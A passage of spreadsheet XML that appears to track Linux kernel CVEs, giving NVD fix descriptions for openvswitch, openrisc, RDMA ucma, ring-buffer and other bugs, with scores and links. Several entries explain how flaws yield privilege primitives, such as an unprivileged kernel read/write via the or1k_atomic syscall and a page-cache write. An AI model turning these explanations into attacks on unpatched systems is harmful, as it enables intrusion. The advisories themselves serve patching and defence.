      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr"/>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
openvswitch: only skb_tx_error() a packet we are about to drop
queue_userspace_packet() borrows the packet skb -- it only copies it into
a private netlink message (user_skb) and does not own it; on return
do_execute_actions() keeps forwarding it through the flow's remaining
actions. Its error path nevertheless calls skb_tx_error(skb), which via
skb_zcopy_clear() does skb_shinfo(skb)-&gt;flags &amp;= ~SKBFL_ALL_ZEROCOPY,
stripping SKBFL_SHARED_FRAG from that live skb (skb_tx_error()'s kerneldoc
says "skb must be freed afterwards").
For a MSG_ZEROCOPY skb carrying page-cache frags, SKBFL_SHARED_FRAG is
what makes esp_input() skb_cow_data() before in-place AEAD; once it is
stripped a later local ESP-in-UDP delivery decrypts in place over pages
the sender does not own -- an unprivileged page-cache write (the
"Fragnesia" primitive).
do_execute_actions() ignores output_userspace()'s return value, so any
action after a failed USERSPACE upcall inherits the stripped skb.
Move the skb_tx_error() to the flow-miss drop path - the "default"
branch of ovs_dp_process_packet()'s switch(error), before kfree_skb().
The call has been here since commit 36d5fe6a0007 ("core, nfqueue,
openvswitch: Orphan frags in skb_zerocopy and handle errors") but was
harmless until esp_input() began relying on SKBFL_SHARED_FRAG to gate
in-place decrypt; only then did stripping it on a still-forwarded skb
become a page-cache write primitive.</t>
        </is>
      </c>
      <c r="S363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89487</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89488</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr"/>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
openvswitch: Fix CT limit teardown use-after-free
Packet processing uses CT limit state under RCU, while netns teardown
frees that state under ovs_mutex. The CT limit pointer was neither removed
from readers nor protected by a grace period, allowing packet processing to
dereference the freed state.
An unprivileged user can trigger this bug from a user and network
namespace, causing a slab-use-after-free in ovs_ct_execute() when the
netns is torn down.
Publish the CT limit pointer through RCU, remove it before teardown, and
wait for readers before freeing its contents. Keep ovs_mutex around
individual CT limit updates, and use the RCU read-side lock while GET
traverses the RCU-protected limit lists.
Netns teardown detaches the RCU-protected CT limit state in the pernet
.pre_exit callback while holding ovs_mutex.  The pernet core guarantees an
RCU grace period between the .pre_exit and .exit callbacks, so the .exit
callback completes the teardown without adding any extra synchronization.
The netlink command handlers do not need NULL checks because the userspace
netlink socket holds an active reference to its network namespace while a
request is processed. The per-netns exit path therefore cannot run
concurrently with SET, DEL, or GET for that socket's namespace.</t>
        </is>
      </c>
      <c r="S364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89488</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89489</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr"/>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
openrisc: fix arbitrary kernel memory access via or1k_atomic syscall
sys_or1k_atomic() (syscall 244 in the "or1k" ABI) takes two user
pointers, v1 and v2, and swaps the words they point to in hand-written
assembly.
    l.lwz   r29,0(r4)
    l.lwz   r27,0(r5)
    l.sw    0(r4),r27
    l.sw    0(r5),r29
The pointers are not checked with access_ok(). The four memory
accesses also have no exception table entries.
A caller passes a kernel address as either pointer, and the syscall
reads from and writes to it directly.
This gives an unprivileged process a kernel read/write primitive. It
overwrites kernel data such as the sys_call_table, gaining code
execution in kernel context.
Check both pointers before entering the critical section. Add fixups
for the four memory accesses so faults on valid but unmapped user
addresses return -EFAULT.
[shorne@gmail.com: fix comment style]</t>
        </is>
      </c>
      <c r="S365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89489</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89497</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr"/>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
orangefs: skip leading spaces before parsing client debug masks
orangefs_prepare_cdm_array() sizes each client debug keyword buffer
with strcspn(cds_head, " "), but then parses the keyword with %s. The
%s conversion skips leading whitespace, while strcspn() does not.
If a client debug entry starts with a space, the allocation can be sized
for an empty keyword while sscanf() copies the following non-empty token.
This can write past the end of the allocated keyword buffer.
Skip leading spaces before computing the keyword length so the allocation
matches the string parsed by sscanf().</t>
        </is>
      </c>
      <c r="S366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89497</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89499</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr"/>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Stop remote reader update when page swap fails
The remote swap_reader_page callback can return -EBUSY when the writer
moves the head before the remote catches it, particularly during an event
storm on a small buffer. __rb_get_reader_page_from_remote() currently
warns about that failure but continues with the unchanged reader ID and
rearranges the local page list as though the swap succeeded.
Handle the callback failure as a recoverable error. Report it with
pr_warn_ratelimited() and return NULL. Callers already handle a NULL reader
page as a failed attempt. This avoids splicing the same page as both the
previous and new reader without flooding the log under contention.</t>
        </is>
      </c>
      <c r="S367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89499</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89500</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr"/>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Make cpu_buffer::free_page a buffer_data_read_page
Discarding a cached reader page after a concurrent ring buffer resize
uses the new global subbuf_order for the free_pages() call. This
mismatched order may crashes the kernel or leaks memory because the cached
page was allocated under the old size.
Save the actual free_page order alongside the page address to ensure we
always refer to the correct value and do not rely on the potentially
stalled cpu_buffer-&gt;subbuf_order value. The simplest is to make
free_page a buffer_data_read_page which already covers exactly what we
need: a page address and a page order.</t>
        </is>
      </c>
      <c r="S368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89500</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89501</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr"/>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Hold cpu_buffer::lock when resizing a subbuf
Because, ring_buffer_subbuf_order_set() can clear cpu_buffer-&gt;free_page,
hold cpu_buffer-&gt;lock to prevent races with
ring_buffer_alloc_read_page() and ring_buffer_free_read_page().</t>
        </is>
      </c>
      <c r="S369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89501</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89503</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr"/>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Fix subbuf resize race with ring_buffer_alloc_read_page()
ring_buffer_alloc_read_page() is racy with ring_buffer_subbuf_order_set,
it can allocate a reader page with an outdated order. This isn't a big
issue, the user can still re-allocate a new reader page and try again.
However, what is more problematic is if the value of subbuf_order
changes in the middle of ring_buffer_alloc_read_page(). In that case,
bpage-&gt;order might not match the actual allocated memory.
Use bpage-&gt;order for the allocation to prevent this race.</t>
        </is>
      </c>
      <c r="S370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89503</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89507</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr"/>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/ucma: Lock the handler in ucma_write_cm_event()
ctx-&gt;file may only be changed under the handler lock and the xa_lock, which
is what stops uevents being queued for a ctx while ucma_migrate_id() moves
it to another file.  The CM core takes that lock before invoking
ucma_event_handler(), but the write() paths that queue uevents themselves
do not.
ucma_write_cm_event() re-reads ctx-&gt;file for each of its four dereferences,
so ucma_migrate_id() can swap it mid-sequence:
	mutex_lock(&amp;ctx-&gt;file-&gt;mut);			/* file A */
	list_add_tail(&amp;uevent-&gt;list, &amp;ctx-&gt;file-&gt;event_list);	/* file B */
	mutex_unlock(&amp;ctx-&gt;file-&gt;mut);			/* file B */
	wake_up_interruptible(&amp;ctx-&gt;file-&gt;poll_wait);	/* file B */
The window is the mutex_lock() itself: the writer sleeps in it while the
migration reassigns ctx-&gt;file.  The list_add_tail() then runs on file B's
event_list holding only file A's mutex:
  list_add corruption. prev-&gt;next should be next (ffff888101320f30),
    but was ffff88814a08c418. (prev=ffff88814a075c18).
  kernel BUG at lib/list_debug.c:32!
  Call Trace:
   ucma_write_cm_event+0x36e/0x5e0
and file A's mut is left held forever, wedging its next writer in D state.
The uevent is also stranded on a list ucma_cleanup_ctx_events() will not
walk, so it outlives its context.  /dev/infiniband/rdma_cm is 0666 and no
RDMA device is involved, so an unprivileged user reaches all of this.
Take the handler lock, as ucma_cleanup_mc_events() does; ctx-&gt;cm_id is
pinned by the ucma_get_ctx() reference.</t>
        </is>
      </c>
      <c r="S371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89507</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89508</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr"/>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/ucma: Lock the handler in ucma_set_ib_path()
ucma_set_ib_path() calls ucma_event_handler() straight from the write()
path, without the handler lock that keeps ctx-&gt;file stable while a uevent
is queued.  The handler re-reads ctx-&gt;file for every dereference:
	mutex_lock(&amp;ctx-&gt;file-&gt;mut);			/* file A */
	list_add_tail(&amp;uevent-&gt;list, &amp;ctx-&gt;file-&gt;event_list);	/* file B */
	mutex_unlock(&amp;ctx-&gt;file-&gt;mut);			/* file B */
	wake_up_interruptible(&amp;ctx-&gt;file-&gt;poll_wait);	/* file B */
A concurrent ucma_migrate_id() reassigns ctx-&gt;file while the SET_OPTION
caller sleeps in mutex_lock(), so the list_add_tail() lands on file B's
event_list while only file A's mutex is held, racing every other user of
that list:
  BUG: KASAN: slab-use-after-free in __list_add_valid_or_report+0x1aa/0x1c0
  Read of size 8 at addr ffff888153c6a418 by task poc_corr/486
  Call Trace:
   __list_add_valid_or_report+0x1aa/0x1c0
   ucma_event_handler+0x1be/0xc00
   ucma_set_ib_path+0x45e/0x710
   ucma_set_option+0x32e/0x590
   ucma_write+0x1f9/0x330
  Allocated by task 505:
   ucma_write_cm_event+0x1a1/0x660
  Freed by task 505:
   kfree+0x1da/0x4c0
   ucma_get_event+0x5d5/0x7e0
The freed object is a ucma_event that another thread dequeued from file B's
list under file B's mutex.  File A's mut is left held on top of that,
wedging its next writer in uninterruptible sleep.
This path needs a bound and address-resolved cm_id, so it requires an RDMA
device to be present.
Take the handler lock around the call.</t>
        </is>
      </c>
      <c r="S372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89508</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89510</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr"/>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/cxgb4: Cancel reg_work before freeing device on remove
c4iw_uld_state_change() queues reg_work to register the RDMA device.
c4iw_remove() can free ctx-&gt;dev while this work is pending or running,
leaving c4iw_register_device() accessing the freed device.
Cancel reg_work before removing the device.  The registration work can
tear down ctx-&gt;dev when registration fails, so do not unregister or
deallocate it again in that case.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89510</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89520</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr"/>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/core: Make core-sched flips wait for in-flight selections
Core scheduling's pick_next_task() operates on all sibling rqs under one
acquisition of the shared core-wide lock. A -&gt;pick_task() that releases the
rq lock leaves every sibling __lock momentarily free, letting
__sched_core_flip(false) complete mid-selection and rebind rq_lockp() under
it. The selection resumes on the split locks, touching sibling state it no
longer protects, and __schedule() finally releases a lock that was never
taken while leaking the one that was.
Count in-flight core-wide selections in the leader's rq-&gt;core_pick_in_flight
and make __sched_core_flip() wait for the count to drain. The count only
changes under the shared lock, which the flip holds while sampling, so no
other ordering is needed. The wait can repeat while selections overlap, but
the flip backs off between samples and flips are rare cookie-lifetime
events.
sched_core_cpu_deactivate() moves the count to the new leader - a stale copy
left behind would bias it forever if that CPU later returns as its own
leader.</t>
        </is>
      </c>
      <c r="S374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89520</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89522</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr"/>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: staging/ipu7: fix async notifier UAF on probe error path
isys_register_devices() registers the V4L2 async notifier via
isys_notifier_init(). If a subsequent probe step such as
isys_fw_log_init() fails, isys_probe() jumps to the out_cleanup label
which only calls isys_unregister_devices(). That helper tears down the
video devices, subdevices, V4L2 device and media device, but never
unregisters or cleans up the async notifier.
As a result the notifier stays chained in the global notifier_list while
the enclosing struct ipu7_isys is freed by devres, leading to list
corruption and a use-after-free the next time the list is walked.
The remove path already does the right thing by calling
isys_notifier_cleanup() before isys_unregister_devices(). Mirror that on
the probe error path so the notifier is unregistered and cleaned up
before the device is torn down.</t>
        </is>
      </c>
      <c r="S375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89522</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89523</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr"/>
